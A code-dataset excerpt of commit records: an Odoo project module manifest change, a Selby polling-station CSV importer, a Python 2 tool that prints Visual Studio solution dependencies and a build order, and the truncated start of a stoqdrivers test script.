doo,0k/OpenUpgrade,SerpentCS/odoo,0k/odoo,rowemoore/odoo,guewen/OpenUpgrade,luistorresm/odoo,collex100/odoo,numerigraphe/odoo,CopeX/odoo,windedge/odoo,gavin-feng/odoo,gavin-feng/odoo,nagyistoce/odoo-dev-odoo,hassoon3/odoo,blaggacao/OpenUpgrade,BT-ojossen/odoo,camptocamp/ngo-addons-backport,Antiun/odoo,ecosoft-odoo/odoo,mkieszek/odoo,klunwebale/odoo,OpusVL/odoo,datenbetrieb/odoo,fgesora/odoo,naousse/odoo,SAM-IT-SA/odoo,abstract-open-solutions/OCB,eino-makitalo/odoo,oliverhr/odoo,cpyou/odoo,takis/odoo,storm-computers/odoo,nhomar/odoo,ygol/odoo,virgree/odoo,patmcb/odoo,bobisme/odoo,funkring/fdoo,Nick-OpusVL/odoo,dgzurita/odoo,OpenPymeMx/OCB,MarcosCommunity/odoo,luiseduardohdbackup/odoo,rdeheele/odoo,aviciimaxwell/odoo,tinkhaven-organization/odoo,windedge/odoo,wangjun/odoo,charbeljc/OCB,hoatle/odoo,gvb/odoo,Kilhog/odoo,matrixise/odoo,lgscofield/odoo,syci/OCB,abenzbiria/clients_odoo,NL66278/OCB,hanicker/odoo,dariemp/odoo,dariemp/odoo,ubic135/odoo-design,hip-odoo/odoo,ygol/odoo,naousse/odoo,steedos/odoo,spadae22/odoo,ClearCorp-dev/odoo,frouty/odoogoeen,makinacorpus/odoo,x111ong/odoo,aviciimaxwell/odoo,factorlibre/OCB,GauravSahu/odoo,fuhongliang/odoo,jusdng/odoo,leoliujie/odoo,JCA-Developpement/Odoo,steedos/odoo,savoirfairelinux/odoo,matrixise/odoo,prospwro/odoo,Codefans-fan/odoo,dalegregory/odoo,0k/odoo,shingonoide/odoo,hifly/OpenUpgrade,OpenPymeMx/OCB,apanju/GMIO_Odoo,damdam-s/OpenUpgrade,ovnicraft/odoo,CatsAndDogsbvba/odoo,rowemoore/odoo,GauravSahu/odoo,pedrobaeza/OpenUpgrade,massot/odoo,Gitlab11/odoo,odoousers2014/odoo,VielSoft/odoo,realsaiko/odoo,mszewczy/odoo,dalegregory/odoo,feroda/odoo,AuyaJackie/odoo,0k/odoo,RafaelTorrealba/odoo,JCA-Developpement/Odoo,addition-it-solutions/project-all,xzYue/odoo,nhomar/odoo,hbrunn/OpenUpgrade,highco-groupe/odoo,odooindia/odoo,joshuajan/odoo,rubencabrera/odoo,diagramsoftware/odoo,addition-it-solutions/project-all,srimai/odoo,savoirfairelinux/odoo,papouso/odoo,ygol/odoo,funkring/fdoo,pedrobaeza/OpenUpgrade,Endika/odoo,gsmartway/odoo,csrocha/OpenUpgrade,cdrooom/odoo,sergio-incaser/odoo,xzYue/odoo,factorlibre/OCB,colinnewell/odoo,fgesora/odoo,alhashash/odoo,hubsaysnuaa/odoo,bplancher/odoo,erkrishna9/odoo,omprakasha/odoo,sebalix/OpenUpgrade,mmbtba/odoo,sv-dev1/odoo,x111ong/odoo,zchking/odoo,JGarcia-Panach/odoo,chiragjogi/odoo,makinacorpus/odoo,rubencabrera/odoo,NeovaHealth/odoo,SAM-IT-SA/odoo,ehirt/odoo,shaufi10/odoo,aviciimaxwell/odoo,bguillot/OpenUpgrade,kittiu/odoo,abdellatifkarroum/odoo,shingonoide/odoo,alexcuellar/odoo,shaufi/odoo,bkirui/odoo,oliverhr/odoo,hopeall/odoo,tvibliani/odoo,stephen144/odoo,mszewczy/odoo,sebalix/OpenUpgrade,jeasoft/odoo,lombritz/odoo,sinbazhou/odoo,dezynetechnologies/odoo,tinkhaven-organization/odoo,agrista/odoo-saas,pplatek/odoo,hassoon3/odoo,KontorConsulting/odoo,nhomar/odoo,eino-makitalo/odoo,Danisan/odoo-1,jfpla/odoo,frouty/odoo_oph,OpenPymeMx/OCB,grap/OpenUpgrade,rgeleta/odoo,cpyou/odoo,alhashash/odoo,jeasoft/odoo,apanju/odoo,fjbatresv/odoo,matrixise/odoo,hip-odoo/odoo,doomsterinc/odoo,idncom/odoo,OpenUpgrade/OpenUpgrade,javierTerry/odoo,SAM-IT-SA/odoo,abstract-open-solutions/OCB,tvtsoft/odoo8,AuyaJackie/odoo,JonathanStein/odoo,gavin-feng/odoo,doomsterinc/odoo,kybriainfotech/iSocioCRM,mmbtba/odoo,Codefans-fan/odoo,hifly/OpenUpgrade,bplancher/odoo,synconics/odoo,OpenUpgrade-dev/OpenUpgrade,poljeff/odoo,dllsf/odootest,BT-ojossen/odoo,mlaitinen/odoo,vnsofthe/odoo,lombritz/odoo,slevenhagen/odoo-npg,lgscofield/odoo,juanalfonsopr/odoo,ujjwalwahi/odoo,poljeff/odoo,highco-groupe/odoo,apanju/GMIO_Odoo,hoatle/odoo,PongPi/isl-odoo,ThinkOpen-Solutions/odoo,fevxie/odoo,nagyistoce/odoo-dev-odoo,hoatle/odoo,cysnake4713/odoo,jesramirez/odoo,Codefans-fan/odoo,frouty/odoogoeen,hubsaysnuaa/odoo,bakhtout/odoo-educ,collex100/odoo,hoatle/odoo,fjbatresv/odoo,dezynetechnologies/odoo,synconics/odoo,ClearCorp-dev/odoo,Codefans-fan/odoo,stephen144/odoo,ingadhoc/odoo,omprakasha/odoo,hubsaysnuaa/odoo,pplatek/odoo,PongPi/isl-odoo,odoo-turkiye/odoo,mlaitinen/odoo,tarzan0820/odoo,Gitlab11/odoo,mustafat/odoo-1,avoinsystems/odoo,gorjuce/odoo,camptocamp/ngo-addons-backport,javierTerry/odoo,nagyistoce/odoo-dev-odoo,sergio-incaser/odoo,ramitalat/odoo,ygol/odoo,srsman/odoo,addition-it-solutions/project-all,factorlibre/OCB,storm-computers/odoo,dkubiak789/odoo,agrista/odoo-saas,podemos-info/odoo,arthru/OpenUpgrade,apanju/GMIO_Odoo,mvaled/OpenUpgrade,codekaki/odoo,Daniel-CA/odoo,kybriainfotech/iSocioCRM,srsman/odoo,Endika/OpenUpgrade,ccomb/OpenUpgrade,JonathanStein/odoo,OpenPymeMx/OCB,shivam1111/odoo,ramitalat/odoo,VitalPet/odoo,credativUK/OCB,jusdng/odoo,dllsf/odootest,poljeff/odoo,pedrobaeza/odoo,codekaki/odoo,cloud9UG/odoo,ojengwa/odoo,hopeall/odoo,pedrobaeza/odoo,Noviat/odoo,CopeX/odoo,idncom/odoo,ingadhoc/odoo,kifcaliph/odoo,sinbazhou/odoo,ojengwa/odoo,feroda/odoo,oasiswork/odoo,pedrobaeza/OpenUpgrade,abenzbiria/clients_odoo,nexiles/odoo,xzYue/odoo,storm-computers/odoo,doomsterinc/odoo,dgzurita/odoo,nuncjo/odoo,mlaitinen/odoo,Noviat/odoo,BT-ojossen/odoo,eino-makitalo/odoo,gvb/odoo,bakhtout/odoo-educ,stonegithubs/odoo,bealdav/OpenUpgrade,BT-fgarbely/odoo,rschnapka/odoo,feroda/odoo,florentx/OpenUpgrade,Daniel-CA/odoo,leoliujie/odoo,0k/OpenUpgrade,Endika/odoo,simongoffin/website_version,grap/OpenUpgrade,fjbatresv/odoo,dkubiak789/odoo,luiseduardohdbackup/odoo,ShineFan/odoo,VitalPet/odoo,makinacorpus/odoo,Endika/OpenUpgrade,bkirui/odoo,florian-dacosta/OpenUpgrade,frouty/odoogoeen,hopeall/odoo,javierTerry/odoo,hopeall/odoo,klunwebale/odoo,osvalr/odoo,minhtuancn/odoo,incaser/odoo-odoo,ihsanudin/odoo,cloud9UG/odoo,sergio-incaser/odoo,florian-dacosta/OpenUpgrade,sebalix/OpenUpgrade,tarzan0820/odoo,nitinitprof/odoo,arthru/OpenUpgrade,odootr/odoo,rschnapka/odoo,guewen/OpenUpgrade,nhomar/odoo,CatsAndDogsbvba/odoo,lsinfo/odoo,ChanduERP/odoo,eino-makitalo/odoo,oihane/odoo,slevenhagen/odoo,ccomb/OpenUpgrade,steedos/odoo,VitalPet/odoo,charbeljc/OCB,mlaitinen/odoo,damdam-s/OpenUpgrade,nitinitprof/odoo,jiangzhixiao/odoo,podemos-info/odoo,Elico-Corp/odoo_OCB,ihsanudin/odoo,incaser/odoo-odoo,codekaki/odoo,dfang/odoo,luistorresm/odoo,papouso/odoo,jeasoft/odoo,alqfahad/odoo,sysadminmatmoz/OCB,Ernesto99/odoo,MarcosCommunity/odoo,tinkerthaler/odoo,odoousers2014/odoo,ramadhane/odoo,luiseduardohdbackup/odoo,dgzurita/odoo,factorlibre/OCB,funkring/fdoo,andreparames/odoo,pedrobaeza/odoo,rubencabrera/odoo,jfpla/odoo,NL66278/OCB,Bachaco-ve/odoo,dsfsdgsbngfggb/odoo,joariasl/odoo,shingonoide/odoo,stephen144/odoo,bguillot/OpenUpgrade,patmcb/odoo,thanhacun/odoo,feroda/odoo,ApuliaSoftware/odoo,tarzan0820/odoo,javierTerry/odoo,rowemoore/odoo,ihsanudin/odoo,eino-makitalo/odoo,prospwro/odoo,windedge/odoo,damdam-s/OpenUpgrade,jiachenning/odoo,srsman/odoo,gdgellatly/OCB1,doomsterinc/odoo,Gitlab11/odoo,Antiun/odoo,bobisme/odoo,optima-ict/odoo,ojengwa/odoo,GauravSahu/odoo,nuuuboo/odoo,PongPi/isl-odoo,srimai/odoo,Nick-OpusVL/odoo,Grirrane/odoo,dsfsdgsbngfggb/odoo,nitinitprof/odoo,guerrerocarlos/odoo,abdellatifkarroum/odoo,addition-it-solutions/project-all,BT-astauder/odoo,Adel-Magebinary/odoo,RafaelTorrealba/odoo,synconics/odoo,jiachenning/odoo,fossoult/odoo,grap/OpenUpgrade,damdam-s/OpenUpgrade,mszewczy/odoo,inspyration/odoo,gdgellatly/OCB1,gavin-feng/odoo,Antiun/odoo,datenbetrieb/odoo,goliveirab/odoo,hanicker/odoo,shaufi10/odoo,prospwro/odoo,RafaelTorrealba/odoo,Daniel-CA/odoo,jfpla/odoo,sv-dev1/odoo,Ichag/odoo,shaufi10/odoo,BT-rmartin/odoo,odoousers2014/odoo,tangyiyong/odoo,savoirfairelinux/odoo,dsfsdgsbngfggb/odoo,ihsanudin/odoo,ecosoft-odoo/odoo,jeasoft/odoo,poljeff/odoo,tangyiyong/odoo,acshan/odoo,factorlibre/OCB,apanju/odoo,PongPi/isl-odoo,Endika/OpenUpgrade,lsinfo/odoo,nhomar/odoo-mirror,doomsterinc/odoo,optima-ict/odoo,microcom/odoo,mvaled/OpenUpgrade,sv-dev1/odoo,ubic135/odoo-design,joshuajan/odoo,hmen89/odoo,kirca/OpenUpgrade,dezynetechnologies/odoo,slevenhagen/odoo,shivam1111/odoo,BT-fgarbely/odoo,fuhongliang/odoo,frouty/odoogoeen,odoousers2014/odoo,jiachenning/odoo,wangjun/odoo,guerrerocarlos/odoo,dariemp/odoo,fgesora/odoo,VitalPet/odoo,cloud9UG/odoo,n0m4dz/odoo,Endika/odoo,codekaki/odoo,dalegregory/odoo,rowemoore/odoo,diagramsoftware/odoo,spadae22/odoo,hassoon3/odoo,Nick-OpusVL/odoo,shaufi10/odoo,fuselock/odoo,lightcn/odoo,laslabs/odoo,andreparames/odoo,nuuuboo/odoo,CubicERP/odoo,Antiun/odoo,NL66278/OCB,odooindia/odoo,hifly/OpenUpgrade,jeasoft/odoo,jiachenning/odoo,grap/OCB,shingonoide/odoo,pedrobaeza/odoo,bkirui/odoo,nhomar/odoo,Codefans-fan/odoo,hifly/OpenUpgrade,bakhtout/odoo-educ,ApuliaSoftware/odoo,Gitlab11/odoo,bwrsandman/OpenUpgrade,codekaki/odoo,rschnapka/odoo,florian-dacosta/OpenUpgrade,odoo-turkiye/odoo,xzYue/odoo,hifly/OpenUpgrade,alexcuellar/odoo,sinbazhou/odoo,mkieszek/odoo,dfang/odoo,simongoffin/website_version,spadae22/odoo,simongoffin/website_version,sv-dev1/odoo,florian-dacosta/OpenUpgrade,alexteodor/odoo,massot/odoo,abenzbiria/clients_odoo,BT-fgarbely/odoo,janocat/odoo,rahuldhote/odoo,hifly/OpenUpgrade,cedk/odoo,salaria/odoo,osvalr/odoo,jiangzhixiao/odoo,ThinkOpen-Solutions/odoo,Endika/OpenUpgrade,jaxkodex/odoo,0k/odoo,idncom/odoo,hip-odoo/odoo,tarzan0820/odoo,mmbtba/odoo,hanicker/odoo,brijeshkesariya/odoo,Codefans-fan/odoo,ShineFan/odoo,joshuajan/odoo,bealdav/OpenUpgrade,gsmartway/odoo,Grirrane/odoo,rschnapka/odoo,incaser/odoo-odoo,BT-rmartin/odoo,slevenhagen/odoo,alexteodor/odoo,Kilhog/odoo,PongPi/isl-odoo,ChanduERP/odoo,mlaitinen/odoo,apanju/odoo,kirca/OpenUpgrade,dllsf/odootest,deKupini/erp,draugiskisprendimai/odoo,mszewczy/odoo,makinacorpus/odoo,realsaiko/odoo,BT-ojossen/odoo,ujjwalwahi/odoo,bakhtout/odoo-educ,collex100/odoo,demon-ru/iml-crm,xujb/odoo,brijeshkesariya/odoo,mustafat/odoo-1,n0m4dz/odoo,ShineFan/odoo,hanicker/odoo,sysadminmatmoz/OCB,nitinitprof/odoo,JonathanStein/odoo,ygol/odoo,sve-odoo/odoo,odootr/odoo,ShineFan/odoo,papouso/odoo,havt/odoo,agrista/odoo-saas,Nowheresly/odoo,csrocha/OpenUpgrade,gvb/odoo,laslabs/odoo,leoliujie/odoo,rahuldhote/odoo,dariemp/odoo,sergio-incaser/odoo,pedrobaeza/odoo,joshuajan/odoo,jpshort/odoo,Nick-OpusVL/odoo,mmbtba/odoo,oihane/odoo,OpusVL/odoo,erkrishna9/odoo,Ichag/odoo,sve-odoo/odoo,srsman/odoo,joariasl/odoo,fjbatresv/odoo,charbeljc/OCB,diagramsoftware/odoo,mvaled/OpenUpgrade,OpenUpgrade-dev/OpenUpgrade,bplancher/odoo,kybriainfotech/iSocioCRM,nitinitprof/odoo,Maspear/odoo,SAM-IT-SA/odoo,hassoon3/odoo,kifcaliph/odoo,wangjun/odoo,andreparames/odoo,ecosoft-odoo/odoo,abstract-open-solutions/OCB,sinbazhou/odoo,dariemp/odoo,salaria/odoo,dezynetechnologies/odoo,QianBIG/odoo,nuuuboo/odoo,datenbetrieb/odoo,andreparames/odoo,Ichag/odoo,realsaiko/odoo,ThinkOpen-Solutions/odoo,oasiswork/odoo,microcom/odoo,Ernesto99/odoo,nagyistoce/odoo-dev-odoo,Eric-Zhong/odoo,Nick-OpusVL/odoo,Gitlab11/odoo,klunwebale/odoo,vrenaville/ngo-addons-backport,x111ong/odoo,OpenUpgrade/OpenUpgrade,vnsofthe/odoo,Antiun/odoo,oliverhr/odoo,VielSoft/odoo,slevenhagen/odoo-npg,jiangzhixiao/odoo,mlaitinen/odoo,JonathanStein/odoo,deKupini/erp,srimai/odoo,kittiu/odoo,Elico-Corp/odoo_OCB,fevxie/odoo,stonegithubs/odoo,guerrerocarlos/odoo,sysadminmatmoz/OCB,syci/OCB,hopeall/odoo,tvibliani/odoo,x111ong/odoo,kybriainfotech/iSocioCRM,numerigraphe/odoo,naousse/odoo,ovnicraft/odoo,rschnapka/odoo,thanhacun/odoo,VielSoft/odoo,bealdav/OpenUpgrade,fuselock/odoo,Adel-Magebinary/odoo,dalegregory/odoo,goliveirab/odoo,NeovaHealth/odoo,tinkerthaler/odoo,shaufi/odoo,hanicker/odoo,hmen89/odoo,fuselock/odoo,CopeX/odoo,cloud9UG/odoo,waytai/odoo,shaufi/odoo,provaleks/o8,ChanduERP/odoo,papouso/odoo,grap/OpenUpgrade,lsinfo/odoo,bealdav/OpenUpgrade,avoinsystems/odoo,fdvarela/odoo8,ramadhane/odoo,apocalypsebg/odoo,shivam1111/odoo,poljeff/odoo,sebalix/OpenUpgrade,Noviat/odoo,mmbtba/odoo,ihsanudin/odoo,kybriainfotech/iSocioCRM,OpenUpgrade/OpenUpgrade,nexiles/odoo,grap/OpenUpgrade,JonathanStein/odoo,ygol/odoo,jaxkodex/odoo,oliverhr/odoo,gdgellatly/OCB1,takis/odoo,sebalix/OpenUpgrade,agrista/odoo-saas,bwrsandman/OpenUpgrade,tinkhaven-organization/odoo,nuncjo/odoo,ujjwalwahi/odoo,poljeff/odoo,OSSESAC/odoopubarquiluz,jeasoft/odoo,colinnewell/odoo,srsman/odoo,xujb/odoo,abdellatifkarroum/odoo,guewen/OpenUpgrade,makinacorpus/odoo,blaggacao/OpenUpgrade,naousse/odoo,optima-ict/odoo,Danisan/odoo-1,guerrerocarlos/odoo,dalegregory/odoo,elmerdpadilla/iv,aviciimaxwell/odoo,alqfahad/odoo,Danisan/odoo-1,jiangzhixiao/odoo,vnsofthe/odoo,credativUK/OCB,odootr/odoo,fossoult/odoo,Adel-Magebinary/odoo,mszewczy/odoo,BT-astauder/odoo,lgscofield/odoo,csrocha/OpenUpgrade,klunwebale/odoo,odootr/odoo,OSSESAC/odoopubarquiluz,virgree/odoo,bguillot/OpenUpgrade,Nick-OpusVL/odoo,blaggacao/OpenUpgrade,jfpla/odoo,fuhongliang/odoo,florentx/OpenUpgrade,Drooids/odoo,kittiu/odoo,oihane/odoo,tarzan0820/odoo,hubsaysnuaa/odoo,ygol/odoo,cedk/odoo,leorochael/odoo,bwrsandman/OpenUpgrade,kittiu/odoo,camptocamp/ngo-addons-backport,sysadminmatmoz/OCB,ihsanudin/odoo,ClearCorp-dev/odoo,janocat/odoo,lgscofield/odoo,ehirt/odoo,mkieszek/odoo,markeTIC/OCB,papouso/odoo,sadleader/odoo,florian-dacosta/OpenUpgrade,JonathanStein/odoo,Noviat/odoo,frouty/odoogoeen,laslabs/odoo,Kilhog/odoo,havt/odoo,jiangzhixiao/odoo,jpshort/odoo,andreparames/odoo,odoousers2014/odoo,nexiles/odoo,apocalypsebg/odoo,dfang/odoo,VielSoft/odoo,vnsofthe/odoo,demon-ru/iml-crm,guerrerocarlos/odoo,n0m4dz/odoo,frouty/odoogoeen,grap/OCB,dllsf/odootest,pedrobaeza/odoo,mvaled/OpenUpgrade,lightcn/odoo,apocalypsebg/odoo,rgeleta/odoo,janocat/odoo,damdam-s/OpenUpgrade,mkieszek/odoo,CatsAndDogsbvba/odoo,nitinitprof/odoo,MarcosCommunity/odoo,tvtsoft/odoo8,guerrerocarlos/odoo,Noviat/odoo,jfpla/odoo,feroda/odoo,Adel-Magebinary/odoo,elmerdpadilla/iv,wangjun/odoo,OSSESAC/odoopubarquiluz,christophlsa/odoo,kittiu/odoo,OSSESAC/odoopubarquiluz,xujb/odoo,bkirui/odoo,synconics/odoo,lsinfo/odoo,elmerdpadilla/iv,rubencabrera/odoo,savoirfairelinux/OpenUpgrade,Adel-Magebinary/odoo,klunwebale/odoo,Drooids/odoo,dkubiak789/odoo,pplatek/odoo,osvalr/odoo,apanju/odoo,odootr/odoo,hoatle/odoo,ubic135/odoo-design,Daniel-CA/odoo,ShineFan/odoo,hbrunn/OpenUpgrade,tangyiyong/odoo,TRESCLOUD/odoopub,alhashash/odoo,collex100/odoo,Ichag/odoo,wangjun/odoo,provaleks/o8,christophlsa/odoo,juanalfonsopr/odoo,Nowheresly/odoo,highco-groupe/odoo,BT-astauder/odoo,virgree/odoo,sysadminmatmoz/OCB,ShineFan/odoo,sv-dev1/odoo,VitalPet/odoo,Nowheresly/odoo,ehirt/odoo,Adel-Magebinary/odoo,papouso/odoo,ClearCorp-dev/odoo,florian-dacosta/OpenUpgrade,cpyou/odoo,hmen89/odoo,0k/OpenUpgrade,patmcb/odoo,avoinsystems/odoo,n0m4dz/odoo,TRESCLOUD/odoopub,odoo-turkiye/odoo,christophlsa/odoo,abstract-open-solutions/OCB,BT-rmartin/odoo,havt/odoo,hip-odoo/odoo,dariemp/odoo,frouty/odoogoeen,avoinsystems/odoo,javierTerry/odoo,ojengwa/odoo,BT-rmartin/odoo,shingonoide/odoo,omprakasha/odoo,osvalr/odoo,OpenUpgrade-dev/OpenUpgrade,odootr/odoo,abstract-open-solutions/OCB,matrixise/odoo,omprakasha/odoo,vrenaville/ngo-addons-backport,salaria/odoo,bakhtout/odoo-educ,colinnewell/odoo,makinacorpus/odoo,MarcosCommunity/odoo,cpyou/odoo,ovnicraft/odoo,charbeljc/OCB,bobisme/odoo,jolevq/odoopub,osvalr/odoo,rowemoore/odoo,fuhongliang/odoo,BT-astauder/odoo,eino-makitalo/odoo,idncom/odoo,sve-odoo/odoo,fuhongliang/odoo,CatsAndDogsbvba/odoo,sv-dev1/odoo,christophlsa/odoo,jusdng/odoo,mszewczy/odoo,sergio-incaser/odoo,lgscofield/odoo,jesramirez/odoo,Grirrane/odoo,gsmartway/odoo,pplatek/odoo,FlorianLudwig/odoo,MarcosCommunity/odoo,sadleader/odoo,draugiskisprendimai/odoo,FlorianLudwig/odoo,nagyistoce/odoo-dev-odoo,leoliujie/odoo,savoirfairelinux/OpenUpgrade,glovebx/odoo,shivam1111/odoo,cysnake4713/odoo,fossoult/odoo,mszewczy/odoo,AuyaJackie/odoo,ApuliaSoftware/odoo,incaser/odoo-odoo,nuncjo/odoo,mkieszek/odoo,nhomar/odoo-mirror,rgeleta/odoo,mmbtba/odoo,vrenaville/ngo-addons-backport,salaria/odoo,arthru/OpenUpgrade,abdellatifkarroum/odoo,ojengwa/odoo,rahuldhote/odoo,dkubiak789/odoo,camptocamp/ngo-addons-backport,alqfahad/odoo,OpenUpgrade/OpenUpgrade,kifcaliph/odoo,mustafat/odoo-1,chiragjogi/odoo,odooindia/odoo,leoliujie/odoo,CopeX/odoo,virgree/odoo,provaleks/o8,rgeleta/odoo,aviciimaxwell/odoo,CubicERP/odoo,Ernesto99/odoo,kittiu/odoo,ChanduERP/odoo,Endika/OpenUpgrade,abenzbiria/clients_odoo,fdvarela/odoo8,alqfahad/odoo,alexcuellar/odoo,idncom/odoo,grap/OpenUpgrade,xujb/odoo,jaxkodex/odoo,incaser/odoo-odoo,Eric-Zhong/odoo,damdam-s/OpenUpgrade,bakhtout/odoo-educ,nuuuboo/odoo,BT-fgarbely/odoo,bobisme/odoo,leorochael/odoo,TRESCLOUD/odoopub,waytai/odoo,luiseduardohdbackup/odoo,0k/OpenUpgrade,savoirfairelinux/odoo,chiragjogi/odoo,QianBIG/odoo,datenbetrieb/odoo,goliveirab/odoo,ubic135/odoo-design,VitalPet/odoo,CubicERP/odoo,alexcuellar/odoo,naousse/odoo,jiangzhixiao/odoo,ovnicraft/odoo,cloud9UG/odoo,florentx/OpenUpgrade,rubencabrera/odoo,kirca/OpenUpgrade,podemos-info/odoo,bwrsandman/OpenUpgrade,tangyiyong/odoo,acshan/odoo,podemos-info/odoo,Noviat/odoo,gorjuce/odoo,sadleader/odoo,datenbetrieb/odoo,steedos/odoo,waytai/odoo,minhtuancn/odoo,Ichag/odoo,mvaled/OpenUpgrade,nuncjo/odoo,glovebx/odoo,omprakasha/odoo,tvibliani/odoo,camptocamp/ngo-addons-backport,tinkhaven-organization/odoo,naousse/odoo,TRESCLOUD/odoopub,bwrsandman/OpenUpgrade,spadae22/odoo,slevenhagen/odoo-npg,lightcn/odoo,eino-makitalo/odoo,microcom/odoo,cedk/odoo,juanalfonsopr/odoo,dalegregory/odoo,alexteodor/odoo,tvibliani/odoo,pplatek/odoo,incaser/odoo-odoo,Daniel-CA/odoo,KontorConsulting/odoo,tvtsoft/odoo8,fossoult/odoo,shaufi10/odoo,nhomar/odoo-mirror,SAM-IT-SA/odoo,tvibliani/odoo,pplatek/odoo,feroda/odoo,NeovaHealth/odoo,oliverhr/odoo,storm-computers/odoo,Elico-Corp/odoo_OCB,numerigraphe/odoo,JGarcia-Panach/odoo,alhashash/odoo,guewen/OpenUpgrade,oihane/odoo,mvaled/OpenUpgrade,dgzurita/odoo,xzYue/odoo,nuuuboo/odoo,kybriainfotech/iSocioCRM,lombritz/odoo,goliveirab/odoo,grap/OCB,srimai/odoo,x111ong/odoo,ecosoft-odoo/odoo,lsinfo/odoo,jolevq/odoopub,optima-ict/odoo,0k/OpenUpgrade,klunwebale/odoo,ecosoft-odoo/odoo,jusdng/odoo,QianBIG/odoo,FlorianLudwig/odoo,OpenPymeMx/OCB,Ernesto99/odoo,slevenhagen/odoo,GauravSahu/odoo,bobisme/odoo,wangjun/odoo,podemos-info/odoo,lsinfo/odoo,xujb/odoo,numerigraphe/odoo,Bachaco-ve/odoo,JGarcia-Panach/odoo,christophlsa/odoo,hassoon3/odoo,GauravSahu/odoo,rschnapka/odoo,diagramsoftware/odoo,joariasl/odoo,ApuliaSoftware/odoo,demon-ru/iml-crm,jiangzhixiao/odoo,ujjwalwahi/odoo,ccomb/OpenUpgrade,SerpentCS/odoo,odooindia/odoo,gvb/odoo,ChanduERP/odoo,draugiskisprendimai/odoo,osvalr/odoo,OSSESAC/odoopubarquiluz,patmcb/odoo,savoirfairelinux/odoo,leorochael/odoo | addons/project/__terp__.py | addons/project/__terp__.py | {
"name" : "Project Management",
"version": "1.0",
"author" : "Tiny",
"website" : "http://tinyerp.com/module_project.html",
"category" : "Generic Modules/Projects & Services",
"depends" : ["product", "account", 'mrp', 'sale', 'base'],
"description": "Project management module that track multi-level projects, tasks, works done on tasks, eso. It is able to render planning, order tasks, eso.",
"init_xml" : [],
"demo_xml" : ["project_demo.xml"],
"update_xml": [
"project_data.xml",
"project_wizard.xml",
"project_view.xml",
"project_report.xml",
"project_workflow.xml",
"project_security.xml",
],
"active": False,
"installable": True
}
| {
"name" : "Project Management",
"version": "1.0",
"author" : "Tiny",
"website" : "http://tinyerp.com/module_project.html",
"category" : "Generic Modules/Projects & Services",
"depends" : ["product", "account", 'mrp', 'sale', 'base'],
"description": "Project management module that track multi-level projects, tasks, works done on tasks, eso. It is able to render planning, order tasks, eso.",
"init_xml" : [],
"demo_xml" : ["project_demo.xml"],
"update_xml": ["project_data.xml", "project_wizard.xml", "project_view.xml", "project_report.xml", "project_workflow.xml"],
"active": False,
"installable": True
}
| agpl-3.0 | Python |
c1a378adcfd4ccccc44b0c9272e84a765f61f88a | add import script for Selby | chris48s/UK-Polling-Stations,chris48s/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations | polling_stations/apps/data_collection/management/commands/import_selby.py | polling_stations/apps/data_collection/management/commands/import_selby.py | from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = 'E07000169'
addresses_name = 'SelbyDemocracy_Club__04May2017.tsv'
stations_name = 'SelbyDemocracy_Club__04May2017.tsv'
elections = ['local.north-yorkshire.2017-05-04']
csv_delimiter = '\t'
| bsd-3-clause | Python | |
c92fbe2d0d40d3fa1339bf9e2a645c0c8d36bdc3 | Add a tool to be able to diff sln files | csulmone/gyp,csulmone/gyp,csulmone/gyp,csulmone/gyp | tools/pretty_sln.py | tools/pretty_sln.py | #!/usr/bin/python2.5
# Copyright 2009 Google Inc.
# All Rights Reserved.
"""Prints the information in a sln file in a diffable way.
It first outputs each projects in alphabetical order with their
dependencies.
Then it outputs a possible build order.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import re
import sys
def BuildProject(project, built, projects, deps):
# if all dependencies are done, we can build it, otherwise we try to build the
# dependency.
# This is not infinite-recursion proof.
for dep in deps[project]:
if dep not in built:
BuildProject(dep, built, projects, deps)
print project
built.append(project)
def ParseSolution(solution_file):
# All projects, their clsid and paths.
projects = dict()
# A list of dependencies associated with a project.
dependencies = dict()
# Regular expressions that matches the SLN format.
# The first line of a project definition.
begin_project = re.compile(('^Project\("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942'
'}"\) = "(.*)", "(.*)", "(.*)"$'))
# The last line of a project definition.
end_project = re.compile('^EndProject$')
# The first line of a dependency list.
begin_dep = re.compile('ProjectSection\(ProjectDependencies\) = postProject$')
# The last line of a dependency list.
end_dep = re.compile('EndProjectSection$')
# A line describing a dependency.
dep_line = re.compile(' *({.*}) = ({.*})$')
in_deps = False
solution = open(solution_file)
for line in solution:
results = begin_project.search(line)
if results:
# We remove "_gyp" from the names because it helps to diff them.
current_project = results.group(1).replace('_gyp', '')
projects[current_project] = [results.group(2).replace('_gyp', ''),
results.group(3)]
dependencies[current_project] = []
continue
results = end_project.search(line)
if results:
current_project = None
continue
results = begin_dep.search(line)
if results:
in_deps = True
continue
results = end_dep.search(line)
if results:
in_deps = False
continue
results = dep_line.search(line)
if results and in_deps:
dependencies[current_project].append(results.group(1))
continue
# Change all dependencies clsid to name instead.
for project in dependencies:
# For each dependencies in this project
new_dep_array = []
for dep in dependencies[project]:
# Look for the project name matching this cldis
for project_info in projects:
if projects[project_info][1] == dep:
new_dep_array.append(project_info)
dependencies[project] = sorted(new_dep_array)
return (projects, dependencies)
def PrintDependencies(projects, deps):
print "---------------------------------------"
print "Dependencies for all projects"
print "---------------------------------------"
print "-- --"
for (project, dep_list) in sorted(deps.items()):
print "Project : %s" % project
print "Path : %s" % projects[project][0]
if dep_list:
for dep in dep_list:
print " - %s" % dep
print ""
print "-- --"
def PrintBuildOrder(projects, deps):
print "---------------------------------------"
print "Build order "
print "---------------------------------------"
print "-- --"
built = []
for (project, dep_list) in sorted(deps.items()):
if project not in built:
BuildProject(project, built, projects, deps)
print "-- --"
def main():
# check if we have exactly 1 parameter.
if len(sys.argv) != 2:
print 'Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0]
return
(projects, deps) = ParseSolution(sys.argv[1])
PrintDependencies(projects, deps)
PrintBuildOrder(projects, deps)
if __name__ == '__main__':
main()
| bsd-3-clause | Python | |
b01b2757e5bfd9835ce28e6d5e27137c7aa5075b | Add a small test script to call individual methods of a driver | Vauxoo/stoqdrivers,stoq/stoqdrivers,vauxoo-dev/stoqdrivers,stoq/stoqdrivers | tools/testdriver.py | tools/testdriver.py | # -*- Mode: Python; coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
